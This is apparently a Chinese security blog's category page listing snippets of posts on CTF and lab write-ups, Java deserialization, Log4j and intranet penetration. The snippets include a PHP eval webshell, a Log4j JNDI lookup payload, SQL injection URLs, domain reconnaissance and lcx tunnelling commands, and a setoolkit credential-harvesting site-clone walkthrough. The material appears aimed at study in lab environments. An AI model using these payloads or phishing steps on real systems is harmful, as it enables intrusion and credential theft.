网络安全
文章平均质量分 80
ErYao7
这个作者很懒,什么都没留下…
展开
-
常见的端口与服务
端口号 端口说明 攻击技巧 21/22/69 ftp/tftp:文件传输协议 爆破\嗅探\溢出\后门 22 ssh:远程连接 爆破 OpenSSH;28 个退格 23 telnet:远程连接 爆破\嗅探 25 smtp:邮件服务 ...原创 2022-03-01 16:22:19 · 716 阅读 · 0 评论 -
内网渗透篇
域信息搜集命令1.查询当前环境whoami && ipconfig /all2.查询当前域用户net user /domain3.查询域控net time4.查询域工作组net group /domain5.查询域管理用户net group "domain admins" /domain6.查询有几台域控制器 需要域权限net group "Domain controllers"7.查找域...原创 2022-02-28 21:09:32 · 1902 阅读 · 0 评论 -
java安全入门(四)——RMI
RMI 定义RMI 是远程⽅法调⽤的简称,能够帮助我们查找并执⾏远程对象的⽅法。通俗地说,远程调⽤就象将⼀个 class 放在A机器上,然后在B机器中调⽤这个 class 的⽅法。 RMI ( Remote Method Invocation ),为远程⽅法调⽤,是允许运⾏在⼀个Java虚拟机的对象 调⽤运⾏在另⼀个Java虚拟机上的对象的⽅法。 这两个虚拟机可以是运⾏在相同计算机上的不同 进程中,也可以是运⾏在⽹络上的不同计算机中。 Java...原创 2022-02-15 11:15:19 · 3754 阅读 · 0 评论 -
java安全入门(四)——JNDI入门指北
前言log4j2 宛如过年一般,趁此机会对没理清的 JNDI 协议仔细再捋一捋log4j的payload很好记:${jndi:ldap/rmi://xxxxxx/exp}那么,我们就需要研究一下是怎么来的。首先来看rpcRPCRPC即 Remote Procedure Call(远程过程调用),==是一种技术思想而并非一种规范的协议==,是一种通过网络从远程计算机请求服务的过程。常见 RPC 技术和框架有: 应用级的服务框架:阿里的 Dubbo/Dubbox、Google原创 2022-02-14 16:36:12 · 4275 阅读 · 0 评论 -
java安全入门(三)——JDBC反序列化漏洞
对于使用java各种组件的项目,如果所使用的组件本身就存在漏洞,那么大部分实在因为在参数传递的时候收到了污染,而今天介绍的这一种,则是相对于在协议层面上的利用。JDBCJava数据库连接,(Java Database Connectivity,简称JDBC)是Java语言中用来规范客户端程序如何来访问数据库的应用程序接口,提供了诸如查询和更新数据库中数据的方法简单来说,你可以理解为 JDBC是封装好的数据库接口,你可以直接使用java调用该组件的接口,他把数据库的协议封装好了,让你无需对协议原创 2022-02-12 17:32:58 · 2708 阅读 · 0 评论 -
Java安全入门(二)——URLDNS POP链分析
分析该反序列化的入口类是java.util.HashMap,它实现了Serializable接口通过HashMap类的反序列化可以触发DNS查询这是一个内置类无需第三方库即可验证,同时也可以验证无回显时反序列化是否成功POP链总览java.util.HashMap.readObject();java.util.HashMap.putVal();java.util.HashMap.hash();java.net.URL.hashCode();java.net.URLStreamH转载 2022-02-03 11:20:02 · 267 阅读 · 0 评论 -
Java安全入门(二)——CC链1 分析+详解
背景在2015年11月6日FoxGlove Security安全团队的@breenmachine 发布了一篇长博客里,借用Java反序列化和Apache Commons Collections这一基础类库实现远程命令执行的真实案例来到人们的视野,各大Java Web Server纷纷躺枪,这个漏洞横扫WebLogic、WebSphere、JBoss、Jenkins、OpenNMS的最新版。从Apache CommonsCollections 说起。Apache C...原创 2022-01-29 20:07:16 · 10717 阅读 · 4 评论 -
内网学习——0x07 lcx,netcat 和 socat 的使用
1、lcx 使用 lcx 分为 Windows 版和 Linux 版,Linux 版叫 portmap Windows内网端口转发内网失陷主机lcx.exe -slave rhost rport lhost lport公网代理主机lcx.exe -listen lport1 lport2内网失陷主机lcx.exe -slave 123.123.123.123 4444 127.0.0.1 3389公网代理主机lcx.exe -listen 4444 5555在建原创 2022-01-24 18:34:30 · 507 阅读 · 0 评论 -
内网学习——0x06 ICMP 隧道工具使用
1、介绍 在内网中,如果攻击者使用 HTTP、DNS 等应用层隧道都失败了,那么或许可以试试网络层的 ICMP 隧道,ICMP 协议最常见的场景就是使用 ping 命令,而且一般防火墙都不会禁止 ping 数据包。 因此我们便可以将 TCP/UDP 数据封装到 ICMP 的 ping 数据包中,从而绕过防火墙的限制。 2、建立 ICMP 隧道工具 用于建立 ICMP 隧道的工具常见有:ptunnel、icmpsh、icmptunnel 等pt...原创 2022-01-23 20:27:44 · 366 阅读 · 0 评论 -
内网学习——0x05 BloodHound 的使用
1、介绍 BloodHound 使用可视化图形显示域环境中的关系,攻击者可以使用 BloodHound 识别高度复杂的攻击路径,防御者可以使用 BloodHound 来识别和防御那些相同的攻击路径。蓝队和红队都可以使用 BloodHound 轻松深入域环境中的权限关系。 BloodHound 通过在域内导出相关信息,在将数据收集后,将其导入Neo4j 数据库中,进行展示分析。因此在安装 BloodHound 时,需要安装 Neo4j 数据库。...原创 2022-01-23 17:58:55 · 310 阅读 · 0 评论 -
内网学习——0x04 域内信息收集
1、判断是否存在域ipconfig查看网关 IP 地址、DNS 的 IP 地址、域名、本机是否和 DNS 服务器处于同一网段。 ipconfig /all然后,通过反向解析查询命令nslookup 解析域名的 IP 地址,查看是否与 DNS 服务器为同一 IP系统详细信息 systeminfo当前登录域与域用户 net config workstation判断主域net time /domain执行以上命令后,通常有三种情况:存...原创 2022-01-23 16:31:51 · 858 阅读 · 0 评论 -
内网学习——0x03 本地工作组信息收集
1、手动收集本地工作组信息查看当前权限whoami本地网络配置信息ipconfig /all操作系统和版本信息(英文版)systeminfo | findstr /B /C:"OS Name" /C:"OS Version"操作系统和版本信息(中文版)systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"查看系统体系结构echo %PROCESSOR_ARCHITECTURE%查看系统所有...原创 2022-01-23 10:37:06 · 582 阅读 · 0 评论 -
内网学习——0x02 PowerShell
1、介绍PowerShell 可以简单的理解为 cmd 的高级版,cmd 能做的事在 PowerShell 中都能做,但PowerShell 还能做很多 cmd 不能做的事情。 PowerShell 内置在 Windows 7、Windows Server 2008 R2 及更高版本的 Windows 系统中,同时 PowerShell 是构建在 .NET 平台上的,所有命令传递的都是 .NET 对象。PowerShell 有如下...原创 2022-01-23 08:34:31 · 302 阅读 · 0 评论 -
内网学习——0x01 内网常见名词解释
1、工作组工作组 Work Group 是最常见最简单最普通的资源管理模式,就是将不同的电脑按功能分别列入不同的组中,以方便管理。比如在一个网络内,可能有成百上千台工作电脑,如果这些电脑不进行分组,都列在“网上邻居”内,可想而知会有多么乱为了解决这一问题,Windows 9x/NT/2000 引用了“工作组”这个概念,比如一所高校,会分为诸如数学系、中文系之类的,然后数学系的电脑全都列入数学系的工作组中,中文系的电脑全部都列入到中文系 的工作组中……如果你要访问某个系别的资源,就在“网上邻居”.原创 2022-01-22 14:39:02 · 340 阅读 · 0 评论 -
[CISCN2019 华北赛区 Day2 Web1]Hack World1
启动环境题目地址:BUUCTF在线评测首页提示flag位于flag表的flag字段直接输入;select flag from flag;显示sql注入检测单独输入select关键字没有被过滤,说明过滤了空格使用语句;select(flag)from(flag);因为题目提示flag为uuid,uuid是32位随机字符串,所以需要编写python脚本来获取flag先写出一个核心的语句,判断flag的第一个字符是否ascii码为101...原创 2022-01-22 10:59:07 · 1226 阅读 · 0 评论 -
Java安全入门(一)
命令执行首先介绍最基本的 java中的命令执行弹出计算器,最常用的poc,就是下面的这条import java.io.IOException;public class calc { public static void main(String[] args) throws IOException { java.lang.Runtime.getRuntime().exec("calc.exe"); }}运行结果:弹出计算器是没有回显的,如果.原创 2022-01-17 20:05:57 · 3393 阅读 · 0 评论 -
分享学习文章
信息收集篇1.信息收集一如何对专属SRC进行信息收集信息收集一如何对专属SRC进行信息收集 - FreeBuf网络安全行业门户2.信息收集,我们到底该收集什么?信息收集,我们到底该收集什么? - FreeBuf网络安全行业门户3.温故知新:Web渗透信息收集温故知新:Web渗透信息收集 - FreeBuf网络安全行业门户渗透+漏洞篇1.批量漏洞挖掘思路小结批量漏洞挖掘思路小结 - FreeBuf网络安全行业门户2.干货 | Spring Boot漏原创 2022-01-15 20:37:58 · 2476 阅读 · 0 评论 -
Spring Boot Vulnerability Exploit Check List
Spring Boot Vulnerability Exploit Check ListSpring Boot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 check list声明⚠️ 本项目所有内容仅作为安全研究和授权测试使用, 相关人员对因误用和滥用该项目造成的一切损害概不负责目录 Spring Boot Vulnerability Exploit Check List 零:路由和版本 0x01:路由知识 0x02:转载 2022-01-15 20:13:20 · 426 阅读 · 0 评论 -
setoolkit——克隆网站及利用
0. 切换root用户我们先切换到root用户,再去启动工具。密码为登录kali时所使用的密码sudo -i1. setoolkit 启动启动成功2. 选择Social-Engineering Attacks3. 选择Website Attack Vectors4. 选择Credential Harvester Attack Method5.选择Site Cloner6.输入要克隆的网址我要克隆的是我们学校的校园网认证页面...原创 2021-12-27 17:01:26 · 3159 阅读 · 0 评论 -
vulhub漏洞—Weblogic管理控制台未授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-14883)
Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882和CVE-2020-14883。CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。漏洞环境原创 2021-12-20 12:30:35 · 2827 阅读 · 0 评论 -
vulhub漏洞—docker_daemon_api未授权访问漏洞
docker remote apidocker remote api主要的目的是取代命令行界面,docker client和docker daemon通过unix domain socket进行通信.默认情况下,只有本机的root和docker组用户才能操作docker.漏洞成因dockerd -H unix:///var/run/docker. sock -H 0.0. 0.0:2375docker守护进程监听在0.0.0.0,外网可访问没有使用iptable等限制可连接的来源原创 2021-12-17 19:11:35 · 1308 阅读 · 0 评论 -
vulhub漏洞—php环境XML外部实体注入漏洞(XXE)
PHP环境 XML外部实体注入漏洞(XXE)XXE知识总结环境介绍: PHP 7.0.30 libxml 2.8.0 libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。为了演示PHP环境下的XXE漏洞,本例会将libxml2.8.0版本编译进PHP中。PHP版本并不影响XXE利用。vulhub搭建漏洞:github位置:https://github.com/vulhub/vulhub/tree/master/php/php_xxe使用如下命令编译原创 2021-12-17 16:52:36 · 789 阅读 · 0 评论 -
vulhub漏洞—Apache_Solr_RemoteStreaming文件读取与SSRF漏洞
漏洞描述Apache Solr 是一个开源的搜索服务器。在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或任意文件读取。影响范围Apache Solr <= 8.8.1复现过程漏洞环境vulhub搭建:https://github.com/vulhub/vulhub/blob/master/solr/Remote-Streaming-Fileread/README.zh-cn.md执行如下命令启动solr 8.8.1:原创 2021-12-17 15:02:46 · 350 阅读 · 0 评论 -
Apache Log4j代码执行漏洞(CVE-2021-44228)
前言:12 月 10 日凌晨,Apache 开源项目 Log4j2 的远程代码执行漏洞细节被公开,漏洞威胁等级为:严重。Log4j2 是一个基于 Java 的日志记录工具。它重写了 Log4j 框架,引入了大量丰富特性,让用户可以控制日志信息输送的目的地为控制台、文件、GUI 组件等。同时通过定义每一条日志信息的级别,让使用者能够更加细致地控制日志的生成过程。Log4j 是目前全球使用最广泛的 java 日志框架之一。该漏洞还影响着很多全球使用量前列的开源组件,如 Apache Struts2、原创 2021-12-14 11:22:51 · 7904 阅读 · 0 评论 -
攻防世界Web进阶—unserialize3
题目链接https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4821&page=1启动环境分析代码代码定义了一个类,其中有一个方法 wakeup() , _wakeup()会直接退出,并输出" bad requests " 末尾有" ?code= " 看样子是要构造url来绕过wakeup()这个函数了。当对一个对象序列化时,php就会调用sleep方法(如果存在的话原创 2021-12-09 23:35:38 · 331 阅读 · 0 评论 -
[安洵杯2019]easy_serialize_php
知识点反序列化字符逃逸(替换后导致字符串变短)题目链接BUUCTF在线评测[%E5%AE%89%E6%B4%B5%E6%9D%AF%202019]easy_serialize_php审计代码启动环境打开题目是一段代码: <?php$function = @$_GET['f'];function filter($img){ //fileter过滤函数,将falg,php等过滤为空 $filter_arr = array('php','flag','p...原创 2021-12-09 23:31:04 · 3084 阅读 · 2 评论 -
[0CTF 2016]piapiapia
知识点:信息泄露PHP反序列化字符串逃逸(替换后导致字符串变长)参数传递数组绕过字符串检测题目链接BUUCTF在线评测1.启动环境,一个登录框2.dirsearch扫描先拿dirsearch扫描一遍,第一次什么也没有扫到,全部都是429。加上延时并且调一下线程再扫描一次,这一次我们扫到了压缩文件,但是普通的php文件扫不到~~。<!--more-->3.下载源码审计打开config.php,我们发现了flag继续分析源码,发现三原创 2021-12-08 23:03:28 · 897 阅读 · 0 评论 -
Burp suite Intruder功能详解
目录TargetPositions攻击类型第一种 Sniper:第二种 Battering ram:第三种 Pitchfork:第四种 Cluster bomb :总结PayloadsOpetionsTargetPositions攻击类型第一种 Sniper:Sniper - 这个模式是我们最常用的,Sniper是狙击手的意思。这个模式会使用单一的payload【就是导入字典的payload】组。它会针对每个position中$$位置设原创 2021-11-18 18:56:30 · 2676 阅读 · 1 评论 -
DVWA通关详解
Vulnerability: Brute ForceSecurity level is currently: low.分析源码:没有做身份验证<?php//检查变量是否设置(先看有没有Login参数)if( isset( $_GET[ 'Login' ] ) ) {//获取密码,存入pass变量中 $user = $_GET[ 'username' ];//获取密码 $pass = $_GET[ 'password' ];//将密码使用md5加密 $原创 2021-11-19 20:52:41 · 3484 阅读 · 0 评论 -
[极客大挑战 2019]Upload
网址:BUUCTF在线评测题目解题:打开题目实例我们这里发现要上传一张图片,我们先尝试上传一句话木马1.php<?php @eval($_POST['shell']);?>我们使用burp抓取数据包并修改测试:我们先将Content-Type修改为 image/jpeg提交,返回信息提示 NOT php!我们修改后缀 1.phtml,再次提交我们发现提示NO! HACKER! your file included '&a...原创 2021-11-10 19:36:29 · 289 阅读 · 0 评论 -
upload-labs通关详解
Pass-01尝试上传.php文件,提示不成功。只能上传图片类型的文件。分析原因:是因为前端js拦截了,我们先将php文件后缀修改成合法的格式(.gif ),在使用burpsuite抓包,再修改.php后缀。我们可以再upload的相应包中看一下我们是否将文件上传成功了。可以看到我们成功的将一句话木马上传至靶场的服务器。POST[] 中是自己的密码。到这里以及成功了,我们可以尝试使用蚁剑连接。Pass-02第一步还是...原创 2021-11-04 23:09:20 · 7872 阅读 · 3 评论 -
xss-labs (level1-16)保姆级教程
必看原理level1分析页面可得,传参 name=test ,页面回显参数的值test,以及参数的长度分析源码,我们可以看到它将name的值赋给 $str 并在<h2></h2>标签中调用那么 就很明显,这一关主要就是考察反射型xss但是由于不知道服务器端对于提交的敏感字符有没有过滤,所以这里直接在name参数中赋值一个简单的弹窗来进行测试。<script>alert('xss')</script>我...原创 2021-11-01 23:43:58 · 810 阅读 · 0 评论 -
sqli_labs闯关
less-1http://127.0.0.1/sqli-labs/Less-1/?id=1// 加单引号,查看是否有注入http://127.0.0.1/sqli-labs/Less-1/?id=1' //查看有多少列http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 3 --+ // 使id=-1报错,使用联合查找查看那些数据可以回显http://127.0.0.1/sqli-labs/Less-1/?id=-1' union原创 2021-10-27 14:47:20 · 478 阅读 · 0 评论